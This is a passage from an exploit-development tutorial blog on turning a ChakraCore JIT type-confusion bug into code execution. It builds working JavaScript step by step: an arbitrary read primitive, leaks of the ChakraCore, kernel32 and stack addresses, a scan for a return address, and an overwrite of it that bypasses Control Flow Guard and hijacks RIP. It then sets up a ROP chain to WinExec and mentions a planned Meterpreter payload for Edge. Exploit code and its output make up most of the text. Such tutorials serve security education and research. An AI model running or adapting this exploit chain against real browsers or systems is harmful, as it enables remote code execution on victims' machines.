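Because we only ever add the IAT offset to the lower 32 bits of the base address, it is worth knowing what happens if that addition crosses a 4GB boundary: setUint32() would wrap the lower half, and the upper half would be off by one. This did not happen in our testing, but a carry-aware addition is easy to sketch. add64() is a hypothetical helper and the base address below is made up; only the 0x17c0000 and 0x40 offsets come from our IAT analysis.

```javascript
// Hypothetical helper: add a small offset to a 64-bit value
// that is stored as two unsigned 32-bit halves.
function add64(lo, hi, delta) {
    const sum = lo + delta;                     // may exceed 32 bits
    const carry = sum > 0xffffffff ? 1 : 0;     // did we cross a 4GB boundary?
    return [sum >>> 0, (hi + carry) >>> 0];     // >>> 0 keeps only the low 32 bits
}

// Made-up module base whose low half sits close to the 4GB boundary
const fakeBaseLo = 0xfff00000;
const fakeBaseHi = 0x7ff8;

// IAT offset (0x17c0000) plus the entry offset (0x40)
const [entryLo, entryHi] = add64(fakeBaseLo, fakeBaseHi, 0x17c0000 + 0x40);
console.log("0x" + entryHi.toString(16) + entryLo.toString(16).padStart(8, "0"));
```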

Here is the updated code to get the base address of kernel32.dll:

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (whose base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));
}

main();

We can see from here we successfully leak the base address of kernel32.dll.

You may also wonder why our iatEntry is being treated as an array. This is because our read64() function returns an array of two 32-bit values. We are reading 64-bit pointer-sized values, but remember that JavaScript only provides us with means to deal with 32-bit values at a time. Because of this, read64() stores the 64-bit address in two separate 32-bit values, which are managed by an array. We can see this by recalling the read64() function.

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getUint32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getUint32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

We now have pretty much all of the information we need in order to get started with code execution. Let’s see how we can go from ASLR leak to code execution, bearing in mind Control Flow Guard (CFG) and DEP are still items we need to deal with.

Code Execution - CFG Edition

In my previous post on exploiting Internet Explorer, we achieved code execution by faking a vftable and overwriting the function pointer with our ROP chain. This method is not possible in ChakraCore, or Edge, because of CFG.

CFG is an exploit mitigation that validates any indirect function calls. Any function call that performs call qword ptr [reg] would be considered an indirect function call, because there is no way for the program to know ahead of time what the register is pointing to when the call happens. If an attacker was able to overwrite the pointer being called, they could redirect execution anywhere in memory they control. This exact scenario is what we accomplished with our Internet Explorer vulnerability, but that is no longer possible.

With CFG enabled, anytime one of these indirect function calls is executed, we can now actually check to ensure that the function wasn’t overwritten with a nefarious address, controlled by an attacker. I won’t go into more detail, as I have already written about control-flow integrity on Windows before, but CFG basically means that we can’t overwrite a function pointer to gain code execution. So how do we go about this?

CFG is a forward-edge control-flow integrity solution. This means that anytime a call happens, CFG has the ability to check the function to ensure it hasn’t been corrupted. However, what about other control-flow transfer instructions, like a return instruction?

call isn’t the only way a program can redirect execution to another part of a PE or loaded image. ret is also an instruction that redirects execution somewhere else in memory. The way a ret instruction works, is that the value at RSP (the stack pointer) is loaded into RIP (the instruction pointer) for execution. If we think about a simple stack overflow, this is what we do essentially. We use the primitive to corrupt the stack to locate the ret address, and we overwrite it with another address in memory. This leads to control-flow hijacking, and the attacker can control the program.

Since we know a ret is capable of transferring control-flow somewhere else in memory, and since CFG doesn’t inspect ret instructions, we can simply use a primitive like how a traditional stack overflow works! We can locate a ret address that is on the stack (at the time of execution) in an executing thread, and we can overwrite that return address with data we control (such as a ROP gadget which returns into our ROP chain). We know this ret address will eventually be executed, because the program will need to use this return address to return execution to where it was before the given function (whose return address we will corrupt) was called.
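If the call/ret relationship is hard to picture, the following toy model may help. It is only a conceptual sketch and models no real CPU or mitigation: ToyCpu is a hypothetical class in which call pushes a return address and ret pops whatever is on top of the stack into rip, with no validation, which is exactly the property we abuse.

```javascript
// Toy model of call/ret semantics (hypothetical, for illustration only)
class ToyCpu {
    constructor() {
        this.stack = [];   // last element is the "top" of the stack
        this.rip = 0;
    }

    // call: save where to come back to, then jump to the target
    call(target, returnAddress) {
        this.stack.push(returnAddress);
        this.rip = target;
    }

    // ret: blindly load the saved value into the instruction pointer
    ret() {
        this.rip = this.stack.pop();
    }
}

const cpu = new ToyCpu();
cpu.call(0x2000, 0x1005);                       // legitimate call, return address 0x1005 saved

// An attacker with a write primitive corrupts the saved return address
cpu.stack[cpu.stack.length - 1] = 0x41414141;

cpu.ret();                                      // the function "returns"
console.log("rip = 0x" + cpu.rip.toString(16));
```

Nothing in ret() checks where the value came from, which mirrors why a forward-edge check on call instructions does not help here.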

The issue, however, is we have no idea where the stack is for the current thread, or other threads for that matter. Let’s see how we can leverage Chakra/ChakraCore’s architecture to leak a stack address.

Leaking a Stack Address

In order to find a return address to overwrite on the stack (really any active thread’s stack that is still committed to memory, as we will see in part three), we first need to find out where a stack address is. Ivan Fratric of Google Project Zero posted an issue awhile back about this exact scenario. As Ivan explains, a ThreadContext instance in ChakraCore contains stack pointers, such as stackLimitForCurrentThread. The chain of pointers is as follows: type->javascriptLibrary->scriptContext->threadContext. Notice anything about this? Notice the first pointer in the chain - type. As we know, a dynamic object is laid out in memory where vftable is the first hidden property, and type is the second! We already know we can leak the vftable of our dataview2 object (which we used to bypass ASLR). Let’s update our exploit.js to also leak the type of our dataview2 object, in order to follow this chain of pointers Ivan talks about.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (whose base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));
}

main();

We can see our exploit controls dataview2->type by way of typeLo and typeHigh.

Let’s now walk these structures in WinDbg to identify a stack address. Load up exploit.js in WinDbg and set a breakpoint on chakracore!Js::DataView::EntrySetUint32. When we hit this function, we know we are bound to see a dynamic object (DataView) in memory. We can then walk these pointers.

After hitting our breakpoint, let’s scroll down into the disassembly and set a breakpoint on the all-familiar SetValue() method.

After setting the breakpoint, we can hit g in the debugger and inspect the RCX register, which should be a DataView object.

The javascriptLibrary pointer is the first item we are looking for, per the Project Zero issue. We can find this pointer at an offset of 0x8 inside the type pointer.

From the javascriptLibrary pointer, we can retrieve the next item we are looking for - a ScriptContext structure. According to the Project Zero issue, this should be at an offset of javascriptLibrary+0x430. However, the Project Zero issue is considering Microsoft Edge, and the Chakra engine. Although we are leveraging ChakraCore, which is identical in most aspects to Chakra, the offsets of the structures are slightly different (when we port our exploit to Edge in part three, we will see we use the exact same offsets as the Project Zero issue). Our ScriptContext pointer is located at javascriptLibrary+0x450.

Perfect! Now that we have the ScriptContext pointer, we can compute the next offset - which should be our ThreadContext structure. This is found at scriptContext+0x3b8 in ChakraCore (the offset is different in Chakra/Edge).

Perfect! After leaking the ThreadContext pointer, we can go ahead and parse this with the dt command in WinDbg, since ChakraCore is open-sourced and we have the symbols.

As we can see above, ChakraCore/Chakra stores various stack addresses within this structure! This is fortunate for us, as now we can use our arbitrary read primitive to locate the stack! The only thing to notice is that this stack address is not from the currently executing thread (our exploiting thread). We can view this by using the !teb command in WinDbg to view information about the current thread, and see how the leaked address fares.

As we can see, we are 0xed000 bytes away from the StackLimit of the current thread. This is perfectly okay, because this value won’t change in between reboots or ChakraCore being restarted. This will be subject to change in our Edge exploit, and we will leak a different stack address within this structure. For now though, let’s use stackLimitForCurrentThread.
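The pointer walk we just performed by hand in WinDbg is really just "read a pointer, add an offset, repeat". Here is a minimal standalone sketch of that idea over a fake memory map. The addresses in fakeMemory are made up and small enough to fit in a single number, and readPtr() and followChain() are hypothetical helpers; only the offsets (0x8, 0x450, 0x3b8 and 0xc8) are the ChakraCore offsets used in this post.

```javascript
// Fake "memory": address -> pointer stored at that address (all values made up)
const fakeMemory = new Map([
    [0x1000 + 0x8,   0x2000],   // type->javascriptLibrary
    [0x2000 + 0x450, 0x3000],   // javascriptLibrary->scriptContext
    [0x3000 + 0x3b8, 0x4000],   // scriptContext->threadContext
    [0x4000 + 0xc8,  0x5000],   // threadContext->stackLimitForCurrentThread
]);

// Hypothetical stand-in for an arbitrary read primitive
function readPtr(address) {
    if (!fakeMemory.has(address)) {
        throw new Error("unmapped address 0x" + address.toString(16));
    }
    return fakeMemory.get(address);
}

// Dereference start+offset repeatedly, once per offset in the chain
function followChain(start, offsets) {
    let pointer = start;
    for (const offset of offsets) {
        pointer = readPtr(pointer + offset);
    }
    return pointer;
}

const fakeType = 0x1000;
const fakeStackLimit = followChain(fakeType, [0x8, 0x450, 0x3b8, 0xc8]);
console.log("stack limit: 0x" + fakeStackLimit.toString(16));
```

In the real exploit each step is a read64() call on two 32-bit halves, but the shape of the walk is the same.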

Here is our updated code, including the stack leak.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (whose base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (located at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext (located at scriptContext+0x3b8)
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));
}

main();

Executing the code shows us that we have successfully leaked the stack for our current thread.

Now that we have the stack located, we can scan the stack to locate a return address, which we can corrupt to gain code execution.

Locating a Return Address

Now that we have a read primitive and we know where the stack is located, we can “scan the stack” in search of any return addresses. As we know, when a call instruction executes, the return address is pushed onto the stack. This is so the called function knows where to return execution after it is done executing and is ready to perform the ret. What we will be doing is locating the place on the stack where this return address has been pushed, and we will corrupt it with some data we control.

To locate an optimal return address, we can take multiple approaches. The approach we will take is a “brute-force” approach. This means we put a loop in our exploit that scans the stack and prints its contents. Any address that starts with 0x7fff we can assume is a return address pushed onto the stack (this is a slight oversimplification, as other data, such as plain pointers into loaded modules, is also located on the stack). We can then look at a few addresses in WinDbg to confirm whether they are return addresses or not, and overwrite them accordingly. Do not worry if this seems like a daunting process, I will walk you through it.
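Since our read primitive hands back 64-bit values as two 32-bit halves, "starts with 0x7fff" simply means the upper half equals 0x00007fff. The sketch below shows one way this filter could look. The scanned values are made up, and looksLikeModulePointer() is a hypothetical helper, not something the exploit requires.

```javascript
// Hypothetical filter: does this 64-bit value (as [lo, hi] halves)
// look like 0x00007fffXXXXXXXX?
function looksLikeModulePointer(lo, hi) {
    return hi === 0x7fff;
}

// Made-up stack contents, each entry is [lo, hi]
const scannedValues = [
    [0x00000000, 0x00000000],   // empty slot
    [0x25c78b40, 0x00007fff],   // candidate: pointer into a loaded module
    [0x056ff000, 0x000000f7],   // looks like a stack address, not a module
    [0x00000001, 0x00000000],   // small integer
];

// Keep only the values worth checking by hand in WinDbg
const candidates = scannedValues.filter(([lo, hi]) => looksLikeModulePointer(lo, hi));

for (const [lo, hi] of candidates) {
    console.log("candidate: 0x" + hi.toString(16) + lo.toString(16).padStart(8, "0"));
}
```

A candidate that passes this filter is still only a candidate; we still need to disassemble it to confirm it is a real return address.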

Let’s start by adding a loop in our exploit.js which scans the stack.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (whose base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (located at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext (located at scriptContext+0x3b8)
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Loop
    while (counter < 0x10000)
    {
        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Print update
        print("[+] Stack address 0x" + hex(stackLeak[1]) + hex(stackLeak[0]+counter) + " contains: 0x" + hex(tempContents[1]) + hex(tempContents[0]));

        // Increment the counter
        counter += 0x8;
    }
}

main();

As we can see above, we are going to scan the stack, up through 0x10000 bytes (which is just an arbitrary value). It is worth noting that the stack grows “downwards” on x64-based Windows systems. Since we have leaked the stack limit, this is technically the “lowest” address our stack can grow to. The stack base is the upper bound: the highest address of the stack, where it begins. This can be examined more thoroughly by referencing our !teb command output previously seen.

For instance, let’s say our stack starts at the address 0xf7056ff000 (based on the above image). We can see that this address is within the bounds of the stack base and stack limit. If we were to perform a push rax instruction to place RAX onto the stack, the stack address would then “grow” to 0xf7056feff8. The same concept can be applied to function prologues, which allocate stack space by performing sub rsp, 0xSIZE. Since we leaked the “lowest” the stack can be, we will scan “upwards” by adding 0x8 to our counter after each iteration.
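The arithmetic here is easy to check for ourselves. The short sketch below reproduces the push example, and then a function prologue that reserves stack space. The 0x28 size is an assumption chosen purely for illustration.

```javascript
// Stack pointer from the example above
let rsp = 0xf7056ff000;

// push rax: the stack pointer moves DOWN by 8 bytes
rsp -= 0x8;
const rspAfterPush = rsp;
console.log("after push rax:      0x" + rspAfterPush.toString(16));

// sub rsp, 0x28: a prologue reserving 0x28 bytes (size chosen for illustration)
rsp -= 0x28;
const rspAfterPrologue = rsp;
console.log("after sub rsp, 0x28: 0x" + rspAfterPrologue.toString(16));
```

In both cases the address gets numerically smaller, which is why scanning from the stack limit means walking towards higher addresses.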

Let’s now run our updated exploit.js in a cmd.exe session without any debugger attached, and output this to a file.

As we can see, we received an access denied. This actually has nothing to do with our exploit, except that we attempted to read memory that is invalid as a result of our loop. This is because we set an arbitrary value of 0x10000 bytes to read - but all of this memory may not be resident at the time of execution. This is no worry, because if we open up our results.txt file, where our output went, we can see we have plenty to work with here.

Scrolling down a bit in our results, we can see we have finally reached the location on the stack with return addresses and other data.

What we do next is a “trial-and-error” approach: we take one of the 0x7fff addresses, which we know is a standard user-mode address from a loaded module backed by disk (e.g. ntdll.dll), disassemble it in WinDbg to determine if it is a return address, and attempt to use it.

I have already gone through this process, but will still show you how I would go about it. For instance, after parsing results.txt I located the address 0x7fff25c78b0 on the stack. Again, any other address beginning with 0x7fff that turns out to be a return address could work as well.

After seeing this address, we need to find out if this is an actual return address. To do this, we can execute our exploit within WinDbg and set a break-on-load breakpoint for chakracore.dll. This will tell WinDbg to break when chakracore.dll is loaded into the process space.

After chakracore.dll is loaded, we can disassemble our memory address and as we can see - this is a valid ret address.

What this means is at some point during our code execution, the function chakracore!JsRun is called. When this function is called, chakracore!JsRun+0x40 (the return address) is pushed onto the stack. When chakracore!JsRun is done executing, it will return to this instruction. What we will want to do is first execute a proof-of-concept that will overwrite this return address with 0x4141414141414141. This means when chakracore!JsRun is done executing (which should happen during the lifetime of our exploit running), it will try to load its return address into the instruction pointer - which will have been overwritten with 0x4141414141414141. This will give us control of the RIP register! Once more, to reiterate, the reason why we can overwrite this return address is because at this point in the exploit (when we scan the stack), chakracore!JsRun’s return address is on the stack. This means between the time our exploit is done executing, as the JavaScript will have been run (our exploit.js), chakracore!JsRun will have to return execution to the function which called it (the caller). When this happens, we will have corrupted the return address to hijack control-flow into our eventual ROP chain.

Now we have a target address, which is located 0x1768bc0 bytes away from the base of chakracore.dll.
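Searching the stack for this one value boils down to comparing both 32-bit halves at every 8-byte slot. Below is a standalone sketch of that search, with an upper bound so the loop cannot walk off into unmapped memory forever. Everything here is simulated: makeFakeRead64() is a hypothetical stand-in for our real read64(), findQword() is a hypothetical helper, and the stack and module addresses are made up.

```javascript
// Hypothetical stand-in for read64(): returns [lo, hi] from a fake memory map
function makeFakeRead64(memory) {
    return function (lo, hi) {
        const value = memory.get(hi + ":" + lo);
        return value === undefined ? [0, 0] : value;
    };
}

// Scan 8 bytes at a time, returning the offset of the target or -1 if not found
function findQword(read64, startLo, startHi, targetLo, targetHi, maxBytes) {
    for (let offset = 0; offset < maxBytes; offset += 0x8) {
        const [lo, hi] = read64(startLo + offset, startHi);
        if (lo === targetLo && hi === targetHi) {
            return offset;
        }
    }
    return -1;
}

// Made-up stack limit and made-up module base (0x7fff50000000) plus our 0x1768bc0 offset
const fakeStackLo = 0x056e0000, fakeStackHi = 0xf7;
const fakeTargetLo = 0x50000000 + 0x1768bc0, fakeTargetHi = 0x7fff;

// Plant the target value 0x1f8 bytes above the fake stack limit
const fakeStack = new Map([
    [fakeStackHi + ":" + (fakeStackLo + 0x1f8), [fakeTargetLo, fakeTargetHi]],
]);

const foundOffset = findQword(makeFakeRead64(fakeStack), fakeStackLo, fakeStackHi,
                              fakeTargetLo, fakeTargetHi, 0x1000);
console.log("found at stack limit + 0x" + foundOffset.toString(16));
```

The maxBytes bound is a design choice of this sketch; it trades a possible miss for never looping indefinitely.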

With this in mind, we can update our exploit.js to the following, which should give us control of RIP.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (whose base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (located at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext (located at scriptContext+0x3b8)
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]+counter));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // When execution reaches here, stackLeak+counter contains the stack address with the return address we want to overwrite
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
}

main();

Let’s run this updated script in the debugger directly, without any breakpoints.

After running our exploit, we encounter an access violation! A ret instruction is attempting to return to the address we overwrote. This is likely the result of JsRun invoking one or more functions which eventually return through the return address we corrupted. If we take a look at the stack, we can see the culprit of our access violation - ChakraCore is trying to return into the address 0x4141414141414141 - an address which we control! This means we have successfully controlled program execution and RIP!

All that is left now is to write a ROP chain to the stack and overwrite RIP with our first ROP gadget; the chain will call WinExec to spawn calc.exe.

Code Execution

With complete stack control via our arbitrary write primitive plus stack leak, and with control-flow hijacking available to us via a return address overwrite, we can now deliver a ROP payload. ROP is needed, of course, because DEP prevents us from executing data we place on the stack. Since we know where the stack is, we can replace the 0x4141414141414141 placeholder at the overwritten return address with our first ROP gadget. We can use the rp++ utility to parse the .text section of chakracore.dll for useful ROP gadgets. Our goal (for this part of the blog series) will be to invoke WinExec. Note that this won’t be possible in Microsoft Edge (which we will exploit in part three) because Edge’s child process mitigation prevents spawning new processes. We will opt for a Meterpreter payload for our Edge exploit, which comes in the form of a reflective DLL to avoid spawning a new process. However, since ChakraCore doesn’t have these constraints, let’s parse chakracore.dll for ROP gadgets and then take a look at the WinExec prototype.

Let’s use the following rp++ command: rp-win-x64.exe -f C:\PATH\TO\ChakraCore\Build\VcBuild\x64_debug\ChakraCore.dll -r > C:\PATH\WHERE\YOU\WANT\TO\OUTPUT\gadgets.txt

ChakraCore is a very large code base, so gadgets.txt will be decently big. This is also why the rp++ command takes a while to parse chakracore.dll. Taking a look at gadgets.txt, we can see our ROP gadgets.

Moving on, let’s take a look at the prototype of WinExec.

As the prototype shows, WinExec takes two parameters: lpCmdLine and uCmdShow. Because of the __fastcall calling convention, the first parameter needs to be stored in RCX and the second parameter needs to be in RDX.

Our first parameter, lpCmdLine, needs to be a string containing calc. At a deeper level, we need to find a memory address and use an arbitrary write primitive to store the string there. In other words, lpCmdLine needs to be a pointer to the string calc.
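To make the encoding of the string concrete, here is a minimal sketch of how a short ASCII string maps onto the two 32-bit halves our write primitive works with. The helper name packAscii is hypothetical and not part of the original exploit; it only shows why calc becomes 0x636c6163 on a little-endian system.

```javascript
// Hypothetical helper: pack up to 8 ASCII characters into [low32, high32], little-endian.
function packAscii(str) {
    if (str.length > 8) {
        throw new RangeError("at most 8 characters fit in one 64-bit slot");
    }
    // Zero-filled buffer, so strings shorter than 8 characters end up NUL-terminated
    const bytes = new Uint8Array(8);
    for (let i = 0; i < str.length; i++) {
        bytes[i] = str.charCodeAt(i) & 0xff;
    }
    const view = new DataView(bytes.buffer);
    return [view.getUint32(0, true), view.getUint32(4, true)];
}

const calcWords = packAscii("calc");
print_or_log("0x" + calcWords[0].toString(16));

// Use print() in the ChakraCore shell, console.log() elsewhere
function print_or_log(msg) {
    if (typeof print === "function") { print(msg); } else { console.log(msg); }
}
```

The low half comes out as 0x636c6163 and the high half as 0, which matches the value placed after the pop rax gadget.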

Looking at our gadgets.txt file, let’s look for some ROP gadgets to help us achieve this. Within gadgets.txt, we find three useful ROP gadgets.

